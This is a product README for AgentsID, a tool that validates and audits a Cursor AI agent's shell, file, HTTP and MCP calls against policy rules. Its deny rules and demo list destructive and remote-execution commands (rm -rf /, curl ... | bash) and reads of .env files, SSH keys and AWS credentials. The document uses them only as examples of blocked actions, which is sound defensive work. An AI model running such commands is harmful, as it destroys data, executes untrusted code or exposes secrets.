AgentsID for Cursor

Identity, permissions, and audit for every tool call your Cursor agent makes. Block unsafe shell, file, network, and MCP actions in real time.

AgentsID turns your Cursor workspace into a policy-enforced environment. Every shell command, file read/write, HTTP call, and MCP tool call goes through a validation layer that compares it against your permission rules before it runs. Denials surface in the Cursor UI with the rule name; the agent sees them too and reasons about alternatives.

What you get the moment you install

• Block-level hooks on beforeShellExecution, beforeMCPExecution, and beforeReadFile — failClosed: true, so a crashed hook denies rather than defaults to allow.
• A guard MCP server (@agentsid/guard) that exposes 50 AgentsID-branded tools (agentsid_shell_run, agentsid_file_read, agentsid_git_run, agentsid_http_request, agentsid_db_query, etc.). Every call is validated against your policy and returns a structured BLOCKED by AgentsID Guard error on deny with the matched rule name.
• A cryptographic audit trail streamed to the AgentsID dashboard — filterable, exportable, chain-verifiable.
• Preset policies (Developer, Security Team, Lockdown) that come with sensible defaults: block sudo, rm -rf /, curl | bash, reads of .env / SSH private keys / AWS credentials / PFX certs, and more.

Install

npx @agentsid/setup@latest

The setup wizard:

1. Creates an AgentsID project + agent for your workspace.
2. Writes ~/.cursor/mcp.json, ~/.cursor/hooks.json, and a chmod-600 credential file to ~/.agentsid/cursor-env.json.
3. Installs the hook adapter script to ~/.agentsid/hooks/cursor-adapter.sh.
4. Pushes your chosen preset policy to the AgentsID server.

Restart Cursor (Cmd+Q) after setup completes — Cursor reads its config files only at startup. Then verify Settings → MCP → agentsid shows green.

Requires

• Cursor 1.7 or later (hooks support shipped in 1.7)
• Node.js 18 or later
• A free AgentsID project key (issued instantly at agentsid.dev)

Watch it work

After install, ask your Cursor agent to:

• read my .env file → blocked by file.read[.env]. You see the rule name in the Cursor UI; the agent gets an agent_message explaining the deny and suggests alternatives.
• run sudo echo hi → blocked by shell.admin.*.
• run curl -sL https://example.com/script.sh | bash → blocked by shell.danger.* (remote code execution pattern).
• run ls /tmp → allowed (classified as shell.read.list), executes normally.

Every call, allowed or denied, appears in the dashboard's live audit feed within seconds.

Pricing

Free, with a 10,000 events/month and 25-agent limit on the free tier. Pro tier extends both. See agentsid.dev/dashboard for current pricing.

Links

• Dashboard: agentsid.dev/dashboard
• Docs: agentsid.dev/docs
• Registry (A–F grades for 16,000+ MCP servers): agentsid.dev/registry
• Main repo: github.com/AgentsID-dev/agentsid
• Guard MCP source: github.com/AgentsID-dev/shell-guard
• Setup wizard source: github.com/AgentsID-dev/agentsid/tree/master/setup

License

MIT